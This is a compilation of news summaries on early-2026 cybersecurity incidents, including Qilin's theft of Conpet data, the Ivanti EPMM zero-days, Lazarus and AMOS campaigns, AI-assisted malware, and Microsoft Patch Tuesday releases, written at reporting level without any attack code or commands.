The Qilin ransomware group has confirmed the theft of nearly **1TB of data** from **Conpet S.A.**, Romania’s national oil pipeline operator, following a cyberattack on February 5, 2026. While the company’s **operational technologies (SCADA and telecommunications) remained unaffected**, the breach compromised corporate IT systems, exposing internal documents—including financial records and passport scans—some dated as recently as **November 2025**. Conpet has warned of potential fraud risks stemming from the stolen data and is working with Romania’s **National Cyber Security Directorate (DNSC)** to investigate the incident. This attack is part of Qilin’s broader 2025–2026 campaign, which has targeted high-profile victims across **62 countries**, including **Asahi Group (Japan)**, **Mecklenburg County Public Schools (U.S.)**, **Creative Box Inc. (Nissan subsidiary)**, and **Synnovis (UK pathology provider)**. The group employs **hybrid tactics**, such as abusing **Windows Subsystem for Linux (WSL)** to deploy Linux encryptors on Windows systems, **BYOVD (Bring Your Own Vulnerable Driver) exploits**, and **supply-chain compromises via Managed Service Providers (MSPs)**. Qilin’s **double-extortion model**—combining encryption with data leaks—has disrupted critical infrastructure, manufacturing, and financial sectors, with **over 700 confirmed victims in 2025 alone**. Recent developments include **politically charged leaks in South Korea** and **collaborations with affiliates like Scattered Spider**, underscoring the group’s evolving threat to global cybersecurity.

Dutch telecommunications provider Odido suffered a cyberattack that exposed personal data of 6.2 million customers. The breach occurred in their customer contact system, but no passwords, call logs, or billing information were affected. The company detected the incident on February 7 and has since taken steps to secure their systems and notify affected customers. The exposed data includes full names, addresses, mobile numbers, customer numbers, email addresses, IBANs, dates of birth, and identification data. Odido has reported the breach to the Dutch Data Protection Authority and is working with external cybersecurity experts to mitigate the incident.

A critical remote code execution (RCE) vulnerability (CVE-2026-1357) in the WPvivid Backup & Migration plugin for WordPress, installed on over 900,000 websites, allows unauthenticated attackers to upload arbitrary files. The flaw, rated 9.8 in severity, affects versions up to 0.9.123 and can lead to complete website takeover. The vulnerability stems from improper error handling in RSA decryption and lack of path sanitization, enabling directory traversal and malicious PHP file uploads. The issue is mitigated by a 24-hour exploitation window and the need for the 'receive backup from another site' option to be enabled. A patch (version 0.9.124) was released on January 28, 2026, addressing the flaw by improving error handling, filename sanitization, and restricting uploads to specific file types.

The Lazarus Group, a North Korea-linked threat actor, has expanded its operations to target European defense companies in 2025, leveraging a coordinated Operation DreamJob campaign. The attack involved fake recruitment lures and the deployment of various malware, including the ScoringMathTea RAT. This campaign follows earlier attacks on a decentralized finance (DeFi) organization in 2024, where the group deployed multiple cross-platform malware variants, including PondRAT, ThemeForestRAT, and RemotePE. In 2026, North Korean hackers have been observed using AI-generated video and the ClickFix technique to deliver malware for macOS and Windows to targets in the cryptocurrency sector. The threat actor's goal is financial, as suggested by the role of the tools used in an attack on a fintech company investigated by Google's Mandiant researchers. The attack had a strong social engineering component, with the victim being contacted over Telegram from a compromised executive account. The hackers used a Calendly link to a spoofed Zoom meeting page and showed a deepfake video of a CEO to facilitate the attack. Mandiant researchers found seven distinct macOS malware families attributed to UNC1069, a threat group they've been tracking since 2018. UNC1069 has been active since at least April 2018 and is also tracked under the monikers CryptoCore and MASAN. The group has used generative AI tools like Gemini to produce lure material and other messaging related to cryptocurrency. They have attempted to misuse Gemini to develop code to steal cryptocurrency and have leveraged deepfake images and video lures mimicking individuals in the cryptocurrency industry. The group has shifted from spear-phishing techniques and traditional finance (TradFi) targeting towards the Web3 industry since at least 2023, targeting centralized exchanges (CEX), software developers at financial institutions, high-technology companies, and individuals at venture capital funds. In the latest intrusion documented by Google's threat intelligence division, UNC1069 deployed as many as seven unique malware families, including several new malware families such as SILENCELIFT, DEEPBREATH, and CHROMEPUSH. The attack involved a social engineering scheme using a compromised Telegram account, a fake Zoom meeting, a ClickFix infection vector, and reported usage of AI-generated video to deceive the victim. The group used a fake website masquerading as Zoom to deceive victims and reused videos of previous victims to deceive new victims. The attack proceeded with a ClickFix-style troubleshooting command to deliver malware, leading to the deployment of various malicious components designed to gather system information, provide hands-on keyboard access, and steal sensitive data. Additionally, the Lazarus Group has been active since May 2025 with a campaign codenamed graphalgo, involving malicious packages in npm and PyPI repositories. Developers are targeted via social platforms like LinkedIn, Facebook, and Reddit. The campaign includes a fake company named Veltrix Capital in the blockchain and cryptocurrency trading space. Malicious packages are used to deploy a remote access trojan (RAT) that fetches and executes commands from an external server. The RAT supports commands to gather system information, enumerate files and directories, list running processes, create folders, rename files, delete files, and upload/download files. The command-and-control (C2) communication is protected by a token-based mechanism. The campaign checks for the MetaMask browser extension, indicating a focus on cryptocurrency theft. A malicious npm package called "duer-js" was found to harbor a Windows information stealer called Bada Stealer, capable of gathering Discord tokens, passwords, cookies, autofill data, cryptocurrency wallet details, and system information. Another malware campaign weaponizes npm to extort cryptocurrency payments from developers during package installation, blocking installation until victims pay 0.1 USDC/ETH to the attacker's wallet.

The **GPUGate malware campaign**, now linked to the **AMOS infostealer**, continues to evolve with increasingly sophisticated social engineering tactics, targeting macOS users through **fake AI assistant ecosystems, GitHub repositories, and malvertising**. A new campaign, **ClawHavoc**, exploits the OpenClaw and ClawHub AI assistant platform by poisoning its skill marketplace with malicious add-ons (e.g., crypto tools, productivity utilities) that deploy AMOS malware. This follows earlier waves using **fake GitHub repositories, Google Ads, and ClickFix techniques** to distribute AMOS and Odyssey stealers, which harvest credentials, crypto wallets, browser sessions, and system data. The campaign, active since at least **April 2023**, has expanded from traditional phishing and trojanized installers to **abusing AI hype, supply-chain weaknesses, and trusted platforms** (e.g., ChatGPT shared chats, Homebrew, LogMeIn). Threat actors—likely Russian-speaking—operate AMOS as a **Malware-as-a-Service (MaaS)**, with stolen logs sold in underground markets to fuel account takeovers, fraud, and ransomware. The latest ClawHavoc campaign underscores the shift toward **high-impact distribution channels** where weak marketplace vetting enables large-scale infections. Organizations are advised to monitor for suspicious Terminal activity, inspect network egress for exfiltration, and educate users on **ClickFix-style social engineering** and unverified AI tool extensions.

World Leaks, a data extortion group, has added a new malware called RustyRocket to its arsenal. This sophisticated tool, written in Rust, targets both Windows and Linux environments, enabling stealthy data exfiltration and proxy traffic. The malware uses multi-layered encryption and requires a pre-encrypted configuration at runtime, making it difficult to detect. World Leaks has been active since early 2025, gaining initial access through social engineering, stolen credentials, or exposed infrastructure. The group has targeted high-profile companies, including Nike, and has been known to expose stolen data if ransom demands are not met.

Microsoft has patched a command injection flaw (CVE-2026-20841, CVSS score: 8.8) in Notepad for Windows 11. The vulnerability allows remote code execution when users click malicious links in Markdown files. The flaw was exploited by creating Markdown files with 'file://' links to executable files or special URIs to run arbitrary payloads. The issue was fixed in the February 2026 Patch Tuesday update. The vulnerability could execute code in the context of the user opening the Markdown file, granting attackers the same permissions as that user.

TrendAI has identified AI skills, which combine human-readable text with LLM-executable instructions, as a dangerous new attack surface. These skills, used to scale AI operations, pose risks of data theft, sabotage, and disruption. Attackers exploiting these skills could access sensitive organizational data and decision-making logic, leading to potential breaches in various sectors. The risks are particularly acute for AI-enabled SOCs, where injection attacks and detection blind spots are major concerns. TrendAI recommends an eight-phase kill chain model to detect and mitigate threats from unstructured text data, emphasizing the need for skills integrity monitoring and anomaly detection.

A 2026 market intelligence study reveals a significant divide in enterprise security programs based on Continuous Threat Exposure Management (CTEM) adoption. Organizations implementing CTEM show 50% better attack surface visibility and 23-point higher solution adoption. Only 16% of surveyed enterprises have adopted CTEM, while 84% lag behind. The study highlights the importance of CTEM in managing complex attack surfaces and the challenges in gaining organizational buy-in.

In 2025, approximately 50 to 61 percent of newly disclosed vulnerabilities were weaponized within 48 hours, driven by automated attack systems. The time to exploit (TTE) dropped from 745 days in 2020 to 44 days in 2025, with n-day exploits representing over 80% of the CVEs listed in the VulnDB database. Attackers exploit the delay between vulnerability disclosure and patch deployment, which often follows a slower, human-driven process. The traditional patching cadence is no longer sustainable as attackers use AI and automation to rapidly weaponize vulnerabilities, while defenders struggle to keep up. The exploitation economy operates at machine speed, with threat actors leveraging automated scripts, AI, and dark web forums to quickly develop and distribute exploits. Defenders face challenges due to the need for near-perfect stability and the risk of service interruptions, which attackers do not consider. To mitigate this, organizations must transition to automated, policy-driven remediation to close the gap between vulnerability disclosure and patch deployment.

Apple has released emergency updates to address a new zero-day vulnerability (CVE-2026-20700) in dyld, which was exploited in sophisticated attacks targeting specific individuals. This flaw, along with two previously disclosed vulnerabilities (CVE-2025-43529 and CVE-2025-14174) in WebKit, were exploited in the same incidents. The flaws can lead to remote code execution and memory corruption when processing maliciously crafted web content. The affected devices include various iPhone and iPad models running versions of iOS before iOS 26, as well as Mac devices running macOS Tahoe. Apple and Google's Threat Analysis Group discovered the vulnerabilities, and Google has also patched the same flaw (CVE-2025-14174) in Google Chrome, indicating coordinated disclosure. While the attacks were highly targeted, users are advised to update their devices promptly to mitigate ongoing risks. With these updates, Apple has now patched nine zero-day vulnerabilities that were exploited in the wild in 2025 and one in 2026.

Two malware strains were discovered in an organization's network after attackers exploited two zero-day vulnerabilities in Ivanti Endpoint Manager Mobile (EPMM). The vulnerabilities, CVE-2025-4427 and CVE-2025-4428, allow for authentication bypass and remote code execution, respectively. Attackers used these flaws to gain access to the EPMM server, execute arbitrary code, and maintain persistence. The attack began around May 15, 2025, following the publication of a proof-of-concept exploit. The malware sets include loaders that enable arbitrary code execution and data exfiltration. The vulnerabilities affect Ivanti EPMM development branches 11.12.0.4, 12.3.0.1, 12.4.0.1, and 12.5.0.0 and their earlier releases. A China-nexus espionage group was leveraging the vulnerabilities since at least May 15, 2025. The threat actor targeted the /mifs/rs/api/v2/ endpoint with HTTP GET requests and used the ?format= parameter to send malicious remote commands. The malware sets include distinct loaders with the same name, and malicious listeners that allow injecting and running arbitrary code on the compromised system. The threat actor delivered the malware through separate HTTP GET requests in segmented, Base64-encoded chunks. Organizations are advised to update their EPMM instances, monitor for suspicious activity, and implement access restrictions to prevent unauthorized access to mobile device management systems. Ivanti has disclosed two additional critical vulnerabilities, CVE-2026-1281 and CVE-2026-1340, which were exploited in zero-day attacks. These code-injection vulnerabilities allow remote attackers to execute arbitrary code on vulnerable devices without authentication. Ivanti has released RPM scripts to mitigate the vulnerabilities and advises applying them as soon as possible. The vulnerabilities will be permanently fixed in EPMM version 12.8.0.0, scheduled for release later in Q1 2026. CISA has added CVE-2026-1281 to its Known Exploited Vulnerabilities (KEV) catalog, confirming active exploitation. The vulnerabilities affect EPMM versions 12.5.0.0 and prior, 12.6.0.0 and prior, and 12.7.0.0 and prior (Fixed in RPM 12.x.0.x), and EPMM 12.5.1.0 and prior and 12.6.1.0 and prior (Fixed in RPM 12.x.1.x). The RPM patch does not survive a version upgrade and must be reapplied if the appliance is upgraded to a new version. The vulnerabilities affect the In-House Application Distribution and the Android File Transfer Configuration features and do not affect other products, including Ivanti Neurons for MDM, Ivanti Endpoint Manager (EPM), or Ivanti Sentry. Successful exploitation of the EPMM appliance will enable arbitrary code execution on the appliance and allow lateral movement to the connected environment. EPMM contains sensitive information about devices managed by the appliance. Legitimate use of the capabilities will result in 200 HTTP response codes in the Apache Access Log, whereas successful or attempted exploitation will cause 404 HTTP response codes. Customers are advised to review EPMM administrators for new or recently changed administrators, authentication configuration, new push applications for mobile devices, configuration changes to applications, new or recently modified policies, and network configuration changes. In the event of compromise, users are advised to restore the EPMM device from a known good backup or build a replacement EPMM and then migrate data to the device. After restoring, users should reset the password of any local EPMM accounts, reset the password for the LDAP and/or KDC service accounts, revoke and replace the public certificate used for EPMM, and reset the password for any other internal or external service accounts configured with the EPMM solution. The Dutch Data Protection Authority (AP) and the Council for the Judiciary confirmed that their systems were impacted by cyber attacks exploiting Ivanti EPMM vulnerabilities. Work-related data of AP employees, including names, business email addresses, and telephone numbers, were accessed by unauthorized persons. The European Commission identified traces of a cyber attack that may have resulted in access to names and mobile numbers of some of its staff members. Finland's state information and communications technology provider, Valtori, disclosed a breach that exposed work-related details of up to 50,000 government employees. The attacker gained access to information used in operating the service, including names, work email addresses, phone numbers, and device details. Investigations showed that the management system did not permanently delete removed data but only marked it as deleted, potentially compromising device and user data belonging to all organizations that have used the service during its lifecycle. The European Commission's central infrastructure managing mobile devices discovered signs of a breach on January 30, 2026, which may have resulted in access to staff names and mobile numbers. The Dutch justice and security secretary confirmed that the Council for the Judiciary (Rvdr) and the Dutch Data Protection Authority (AP) were breached, with unauthorized access to work-related data of AP employees, including names, business email addresses, and telephone numbers. Finnish government ICT center Valtori discovered a breach on January 30, 2026, affecting its mobile device management service, potentially exposing details of up to 50,000 government workers. Ivanti released patches for two critical (CVSS 9.8) zero-day bugs in EPMM on January 29, 2026, noting that a very limited number of customers had been exploited at the time of disclosure. CVE-2026-1281 and CVE-2026-1340 are code injection flaws that could allow attackers to achieve unauthenticated remote code execution. A significant chunk of the exploitation attempts targeting a newly disclosed security flaw in Ivanti Endpoint Manager Mobile (EPMM) can be traced back to a single IP address on bulletproof hosting infrastructure offered by PROSPERO. GreyNoise recorded 417 exploitation sessions from 8 unique source IP addresses between February 1 and 9, 2026, with 83% originating from 193.24.123[.]42. The same IP address exploited three other CVEs across unrelated software, indicating the use of automated tooling. 85% of the exploitation sessions beaconed home via DNS to confirm target exploitability without deploying malware or exfiltrating data. PROSPERO is linked to another autonomous system called Proton66, which has a history of distributing desktop and Android malware. Defused Cyber reported a "sleeper shell" campaign that deployed a dormant in-memory Java class loader to compromised EPMM instances, indicative of initial access broker tradecraft. Organizations are advised to apply patches, audit internet-facing MDM infrastructure, review DNS logs for OAST-pattern callbacks, monitor for the /mifs/403.jsp path on EPMM instances, and block PROSPERO's autonomous system (AS200593) at the network perimeter level.

Google's Threat Intelligence Group (GTIG) has identified new malware families that leverage artificial intelligence (AI) and large language models (LLMs) for dynamic self-modification during execution. These malware families, including PromptFlux, PromptSteal, FruitShell, QuietVault, and PromptLock, demonstrate advanced capabilities for evading detection and maintaining persistence. PromptFlux, an experimental VBScript dropper, uses Google's LLM Gemini to generate obfuscated VBScript variants and evade antivirus software. It attempts persistence via Startup folder entries and spreads laterally on removable drives and mapped network shares. The malware is under development or testing phase and is assessed to be financially motivated. PromptSteal is a data miner written in Python that queries the LLM Qwen2.5-Coder-32B-Instruct to generate one-line Windows commands to collect information and documents in specific folders and send the data to a command-and-control (C2) server. It is used by the Russian state-sponsored actor APT28 in attacks targeting Ukraine. State-backed hackers from China (APT31, Temp.HEX), Iran (APT42), North Korea (UNC2970), and Russia have used Gemini AI for all stages of an attack, including reconnaissance, phishing lure creation, C2 development, and data exfiltration. Chinese threat actors used Gemini to automate vulnerability analysis and provide targeted testing plans against specific US-based targets. Iranian adversary APT42 leveraged Gemini for social engineering campaigns and to speed up the creation of tailored malicious tools. The use of AI in malware enables adversaries to create more versatile and adaptive threats, posing significant challenges for cybersecurity defenses. Various threat actors, including those from China, Iran, and North Korea, have been observed abusing AI models like Gemini across different stages of the attack lifecycle. The underground market for AI-powered cybercrime tools is also growing, with offerings ranging from deepfake generation to malware development and vulnerability exploitation.

Microsoft's October 2025 Patch Tuesday marked the end of free security updates for Windows 10, addressing 183 vulnerabilities, including six zero-days, with the final cumulative update **KB5066791**. The update also introduced critical fixes for components like Windows SMB Server, Microsoft SQL Server, and Remote Access Connection Manager, alongside third-party vulnerabilities in AMD EPYC processors and IGEL OS. However, a newly disclosed **February 2026 Patch Tuesday** update fixed **CVE-2026-20841**, a high-severity remote code execution flaw in **Windows 11 Notepad** that allowed attackers to execute arbitrary programs via malicious Markdown links without security warnings. The flaw, affecting Notepad versions 11.2510 and earlier, exploited improper command neutralization to launch unverified protocols (e.g., `file://`, `ms-appinstaller://`). Microsoft mitigated the risk by adding execution warnings for non-HTTP(S) URIs, with updates distributed automatically via the Microsoft Store. Prior milestones included out-of-band patches for a critical **WSUS vulnerability (CVE-2025-59287)** with public exploit code, smart card authentication issues caused by cryptographic service changes, and a **RasMan zero-day** (DoS vulnerability) affecting all Windows versions. Windows 10 reached end-of-life, with Extended Security Updates (ESU) available for purchase, while Exchange Server 2016/2019 and Skype for Business 2016 also ended support. The October 2025 update remains the largest on record, with 183 CVEs pushing Microsoft’s annual vulnerability count past 1,021.

Microsoft has identified a multi-stage adversary-in-the-middle (AitM) phishing and business email compromise (BEC) campaign targeting organizations in the energy sector. The attackers abused SharePoint file-sharing services to deliver phishing payloads and created inbox rules to maintain persistence and evade detection. The campaign involved leveraging compromised internal identities to conduct large-scale phishing attacks within and outside the victim organizations. Additionally, the AgreeTo Outlook add-in was hijacked and turned into a phishing kit, stealing over 4,000 Microsoft account credentials. The threat actor deployed a fake Microsoft sign-in page, password collection page, exfiltration script, and redirect, exploiting the add-in's ReadWriteItem permissions. This is the first known instance of malware found on the official Microsoft Marketplace. The add-in was abandoned by its developer and the attacker exploited the abandoned domain to serve the phishing kit. The incident highlights the need for better monitoring of add-ins and their associated URLs.

The Crazy ransomware gang has been observed abusing legitimate employee monitoring software (Net Monitor for Employees Professional) and the SimpleHelp remote support tool to maintain persistence in corporate networks, evade detection, and prepare for ransomware deployment. The attackers used these tools to gain full interactive access to compromised systems, transfer files, execute commands, and monitor system activity in real time. They also attempted to disable Windows Defender and set up monitoring rules to detect cryptocurrency-related activities and remote access tools. The use of multiple remote access tools provided redundancy for the attackers, ensuring they retained access even if one tool was discovered or removed. The breaches were enabled through compromised SSL VPN credentials, highlighting the need for organizations to enforce MFA on all remote access services.

The Netherlands Police arrested a 21-year-old man from Dordrecht for selling access to the JokerOTP phishing automation tool, which intercepts one-time passwords (OTPs) to hijack accounts. The arrest is part of a three-year investigation that led to dismantling the JokerOTP phishing-as-a-service (PhaaS) operation in April 2025. The service caused at least $10 million in financial losses across 28,000 attacks in 13 countries. The seller advertised access via Telegram, allowing cybercriminals to automate calls to victims and capture sensitive data. The tool targeted users of PayPal, Venmo, Coinbase, Amazon, and Apple. The investigation is ongoing, with dozens of buyers identified for prosecution.

Wazuh, a SIEM and XDR platform, enhances cyber resilience through comprehensive visibility, early detection of suspicious activity, automated incident response, and AI-driven security analysis. It supports various environments, including virtualized, on-premises, cloud-based, and containerized systems, and integrates advanced AI models for improved threat detection and response. The platform also focuses on improving IT hygiene and security posture through continuous asset visibility, vulnerability detection, and configuration assessment.

GrayBravo, previously tracked as TAG-150, has developed CastleRAT, a remote access trojan available in both Python and C variants. The threat actor is characterized by rapid development cycles, technical sophistication, and an expansive, evolving infrastructure. GrayBravo has been active since at least March 2025, using CastleLoader to deliver various secondary payloads, including other RATs, information stealers, and loaders. CastleRAT is part of a multi-tiered infrastructure and uses Steam Community profiles as dead drop resolvers for command-and-control (C2) servers. The C variant of CastleRAT includes additional functionalities such as keylogging, screenshot capture, and cryptocurrency clipping. The threat actor employs phishing attacks and fraudulent GitHub repositories to initiate infections. Recent developments include the discovery of TinyLoader, TinkyWinkey, and Inf0s3c Stealer, which are used to deliver additional malware and steal information. CastleLoader has been linked to a Play Ransomware attack against a French organization, and GrayBravo operates with a limited and sophisticated user base, likely promoting its services within closed circles. Four distinct threat activity clusters have been observed leveraging CastleLoader: TAG-160, TAG-161, and two unnamed clusters. TAG-160 targets the logistics sector using phishing and ClickFix techniques, while TAG-161 uses Booking.com-themed ClickFix campaigns to distribute CastleLoader and Matanbuchus 3.0. The third cluster uses infrastructure impersonating Booking.com in conjunction with ClickFix and Steam Community pages as a dead drop resolver to deliver CastleRAT via CastleLoader. The fourth cluster uses malvertising and fake software update lures masquerading as Zabbix and RVTools to distribute CastleLoader and NetSupport RAT. GrayBravo leverages a multi-tiered infrastructure to support its operations, including Tier 1 victim-facing C2 servers and multiple VPS servers as backups. A surge in LummaStealer infections has been observed, driven by social engineering campaigns leveraging the ClickFix technique to deliver the CastleLoader malware. LummaStealer, also known as LummaC2, is an infostealer operation running as a malware-as-a-service (MaaS) platform that was disrupted in May 2025 when multiple tech firms and law enforcement authorities seized 2,300 domains and the central command structure supporting the malicious service. Although the law enforcement operation severely disrupted the LummaStealer activity, the MaaS operation started to resume in July 2025. A new report from cybersecurity company Bitdefender warns that LummaStealer operations have scaled significantly between December 2025 and January 2026, now being delivered through a malware loader called CastleLoader, and increasingly relying on ClickFix techniques.

The **Aisuru/Kimwolf botnet ecosystem** continues to evolve, now **disrupting critical anonymity infrastructure** alongside its record-breaking DDoS campaigns. In **February 2026**, Kimwolf operators **accidentally crippled the I2P anonymity network** by attempting to onboard **700,000 infected devices** as nodes, overwhelming the network’s typical **15,000–20,000-device capacity** and triggering a **Sybil attack** that halved I2P’s functionality. This follows the botnet’s **31.4 Tbps DDoS attack** (November 2025) and **holiday-themed "The Night Before Christmas" campaign** (December 19, 2025), which peaked at **24 Tbps, 9 Bpps, and 205 Mrps**—part of a **100% YoY increase in DDoS volume** (47.1 million attacks mitigated in 2025). With **over 6 million infected devices** (1–4M IoT for Aisuru; **>2M Android TVs/boxes** for Kimwolf), the botnets blend **hyper-volumetric DDoS** with **residential proxy monetization**, targeting sectors beyond gaming to include **telecom, IT, finance, AI, and now anonymity networks**. The **January 2026 takedown of IPIDEA**—a key proxy enabler—reduced millions of exit nodes, but **persistent infections** and **new evasion tactics** (e.g., **I2P/Tor C2 experimentation, ENS-based domains**) highlight the botnets’ **adaptive resilience**. Despite **internal operator conflicts** reducing Kimwolf’s scale by **600,000+ devices**, the ecosystem remains a **systemic risk to global internet stability, enterprise security, and privacy infrastructure**.

APT36, also known as Transparent Tribe, is targeting both Windows and BOSS Linux systems in ongoing attacks against Indian government and defense entities. The campaign, active since June 2025, involves phishing emails delivering malicious .desktop files disguised as PDFs. The malware facilitates data exfiltration, persistent espionage access, and includes anti-debugging and anti-sandbox checks. The malware also targets the Kavach 2FA solution used by Indian government agencies. The attack leverages the .desktop file's 'Exec=' field to execute a sequence of shell commands that download and run a Go-based ELF payload. The payload establishes persistence through cron jobs and systemd services, and communicates with a C2 server via a WebSocket channel. The technique allows APT36 to evade detection by abusing a legitimate Linux feature that is not typically monitored for threats. The campaign demonstrates APT36's evolving tactics, becoming more evasive and sophisticated. The campaign uses dedicated staging servers for malware distribution, transitioning from cloud storage platforms. The malware includes multiple persistence methods and supports commands for file browsing, collection, and remote execution. The campaign is part of a broader trend of targeted activity by South and East Asian threat actors, reflecting a trend toward purpose-built malware and infrastructure. Indian government entities have been targeted in two campaigns codenamed Gopher Strike and Sheet Attack. Gopher Strike leveraged phishing emails to deliver PDF documents with a blurred image and a fake Adobe Acrobat Reader DC update dialog. The campaign uses server-side checks to prevent automated URL analysis tools from fetching the ISO file, ensuring delivery only to intended targets in India. The malicious payload is a Golang-based downloader called GOGITTER, which creates a VBScript file to fetch commands from C2 servers. GOGITTER sets up persistence using a scheduled task to run the VBScript file every 50 minutes. GOGITTER downloads a ZIP file from a private GitHub repository and executes a lightweight Golang-based backdoor called GITSHELLPAD. GITSHELLPAD polls the C2 server every 15 seconds for commands and supports six different commands including cd, run, upload, and download. The results of command execution are stored in a file called "result.txt" and uploaded to the GitHub account. The threat actor also downloads RAR archives containing utilities to gather system information and drop GOSHELL, a bespoke Golang-based loader. GOSHELL's size was artificially inflated to approximately 1 gigabyte to evade detection by antivirus software. GOSHELL only executes on specific hostnames by comparing the victim's hostname against a hard-coded list. APT36 and SideCopy are launching cross-platform RAT campaigns against Indian entities using malware families like Geta RAT, Ares RAT, and DeskRAT. The campaigns use phishing emails with malicious attachments or download links to deliver the malware, which provides persistent remote access, system reconnaissance, data collection, and command execution. Geta RAT supports various commands including system information collection, process enumeration, credential gathering, and file operations. Ares RAT is a Python-based RAT that can run commands issued by the threat actor. DeskRAT is delivered via a rogue PowerPoint Add-In file with embedded macros. The campaigns target Indian defense, government, and strategic sectors, demonstrating a well-resourced, espionage-focused threat actor deliberately targeting these sectors through defense-themed lures, impersonated official documents, and regionally trusted infrastructure.

On February 2026 Patch Tuesday, over 60 software vendors released security updates addressing critical vulnerabilities in their products. Microsoft patched 59 flaws, including six actively exploited zero-days in Windows components. Adobe, SAP, Intel, and Google also issued fixes for critical vulnerabilities in their respective products. The updates cover a wide range of software, including operating systems, cloud platforms, and network devices. The vulnerabilities addressed include security bypass, privilege escalation, denial-of-service (DoS), code injection, and missing authorization checks. Some of the flaws could lead to full database compromise and unauthorized remote function calls. The patches are crucial for maintaining the security of systems and preventing potential exploitation by threat actors.

A Chinese national, Daren Li, has been sentenced to 20 years in prison for his role in a global crypto-investment fraud scheme that defrauded victims of over $73 million. Li pleaded guilty to conspiring to launder funds obtained through cryptocurrency scams and related fraud. The scheme involved romance baiting and tech support scams, with victims contacted through social media, online dating sites, and cold calls. Li and his co-conspirators used spoofed websites and domains to appear legitimate and laundered proceeds through US shell companies.

CISA released its 2025 Year in Review, highlighting achievements in cyber and physical security. The report details CISA's efforts to modernize operations, accelerate threat responses, and collaborate with partners to safeguard critical infrastructure. Key accomplishments include publishing over 1,600 security products, triaging 30,000+ incidents, blocking billions of malicious connections, and conducting 148 security exercises with 10,000+ participants. Additionally, CISA introduced the Be Air Aware™ suite to manage Unmanned Aircraft System Threats.

The Forum of Incident Response and Security Teams (FIRST) forecasts a record-breaking 59,427 new CVEs in 2026, with a 90% confidence interval ranging from 30,012 to 117,673. This prediction is based on a new statistical model using historical CVE data and publication trends. FIRST advises organizations to prepare for this surge by assessing their capacity, prioritizing vulnerabilities, and leveraging forecasting tools. The forecast suggests that CVE disclosures will continue to grow beyond 2026, with a median of 51,018 CVEs in 2027 and 53,289 in 2028.

Threat actors are exploiting misconfigured security testing applications, such as DVWA, OWASP Juice Shop, Hackazon, and bWAPP, to gain access to cloud environments of Fortune 500 companies and security vendors. These applications, intended to be intentionally vulnerable for training and testing, pose a significant risk when exposed on the public internet and executed from privileged cloud accounts. Pentera researchers discovered 1,926 live, vulnerable applications linked to overly privileged IAM roles, deployed on AWS, GCP, and Azure. Many instances used default credentials and exposed cloud credential sets, allowing attackers to deploy crypto miners, webshells, and gain admin access to cloud environments. Active exploitation was confirmed, with evidence of crypto mining using XMRig, deployment of webshells, and advanced persistence mechanisms. Security vendors such as F5, Cloudflare, and Palo Alto Networks were among those affected. Pentera Labs verified nearly 2,000 live, exposed training application instances, with close to 60% hosted on customer-managed infrastructure running on AWS, Azure, or GCP. Approximately 20% of instances were found to contain artifacts deployed by malicious actors, including crypto-mining activity, webshells, and persistence mechanisms.

Microsoft's February 2026 Patch Tuesday addresses 59 vulnerabilities, including 6 actively exploited zero-days and 3 publicly disclosed flaws. The updates include fixes for 5 critical vulnerabilities, with three being security feature bypass flaws in various Microsoft products. The zero-days span components such as Windows Shell, MSHTML Framework, Microsoft Word, Desktop Window Manager, Windows Remote Access Connection Manager, and Windows Remote Desktop Services. Microsoft issued an out-of-band patch for one of the zero-days, CVE-2026-21514, highlighting its urgency. The updates also cover a range of other vulnerabilities, including elevation of privilege, security feature bypass, remote code execution, information disclosure, denial of service, and spoofing flaws. Additionally, Microsoft has begun rolling out updated Secure Boot certificates to replace expiring 2011 certificates. Other vendors, including Adobe, BeyondTrust, CISA, Cisco, Fortinet, Google, n8n, and SAP, have also released security updates or advisories.

A new Linux botnet named SSHStalker has been documented, utilizing the outdated IRC protocol for command-and-control (C2) operations. The botnet employs classic IRC mechanics, including multiple C-based bots and multi-server/channel redundancy, prioritizing resilience and scale over stealth. It achieves initial access through automated SSH scanning and brute-forcing, using a Go binary disguised as nmap. Once infected, hosts are used to scan for additional SSH targets, and the botnet includes exploits for 16 CVEs targeting older Linux kernel versions. The botnet also performs AWS key harvesting, website scanning, and includes cryptomining kits and DDoS capabilities. Notably, SSHStalker maintains persistent access without immediate follow-on post-exploitation behavior, suggesting it may be used for staging, testing, or strategic access retention. The threat actor is suspected to be of Romanian origin, with operational overlaps with the hacking group Outlaw (aka Dota).

Microsoft's November 2025 Patch Tuesday addressed 63 vulnerabilities, including one actively exploited zero-day vulnerability (CVE-2025-62215), a critical Remote Code Execution flaw (CVE-2025-60724), and several other notable vulnerabilities. The updates also included fixes for multiple elevation of privilege, remote code execution, information disclosure, denial-of-service, and spoofing vulnerabilities. Microsoft has released the first extended security update (ESU) for Windows 10, advising users to upgrade to Windows 11 or enroll in the ESU program. The KB5068781 update, the first Windows 10 extended security update since the operating system reached end of support on October 14, 2025, includes fixes for 63 flaws and one actively exploited elevation-of-privilege vulnerability. The September 2025 Patch Tuesday addressed 80 vulnerabilities, including 13 critical vulnerabilities. The updates fixed a range of issues, including privilege escalation, remote code execution, information disclosure, and denial-of-service vulnerabilities. The patches also covered a critical flaw in Azure Networking and addressed a new lateral movement technique dubbed BitLockMove. Additionally, security updates were released by multiple vendors, including Adobe, Cisco, Google, and others. The September 2025 update included 38 elevation of privilege (EoP) vulnerabilities. The two zero-day vulnerabilities were CVE-2025-55234 in Windows SMB Server and CVE-2024-21907 in Microsoft SQL Server. The SMB vulnerability was exploited through relay attacks, while the SQL Server flaw involved improper handling of exceptional conditions in Newtonsoft.Json. The updates also included hardening features for SMB Server to mitigate relay attacks, with recommendations for administrators to enable auditing to assess compatibility issues. The KB5065429 cumulative update for Windows 10 22H2 and 21H2 included fourteen fixes or changes, addressing unexpected UAC prompts and severe lag and stuttering issues with NDI streaming software. The update enabled auditing SMB client compatibility for SMB Server signing and SMB Server EPA, and included an opt-in feature for administrators to allow outbound network traffic from Windows 10 devices. In February 2026, Microsoft released updates to fix six actively exploited zero-day vulnerabilities, three of which have been publicly disclosed. These include CVE-2026-21510, CVE-2026-21513, CVE-2026-21514, CVE-2026-21519, CVE-2026-21525, and CVE-2026-21533. None of the actively exploited vulnerabilities are rated critical. In total, 25 CVEs disclosed by Microsoft were EoP, followed by remote code execution (12), spoofing (7), information disclosure (6), and security feature bypass (5). SAP also released 26 new security notes and one update to a previously released note, including critical vulnerabilities CVE-2026-0509 and CVE-2026-0488.

Microsoft has released Windows 11 26H1, but it is exclusively for new devices with Snapdragon X2 processors and other upcoming ARM chips. This release is not a feature update for existing PCs but is designed to support new ARM-based hardware. Windows 11 26H2 is expected to follow the annual update cadence and will be available for all other PCs later this year.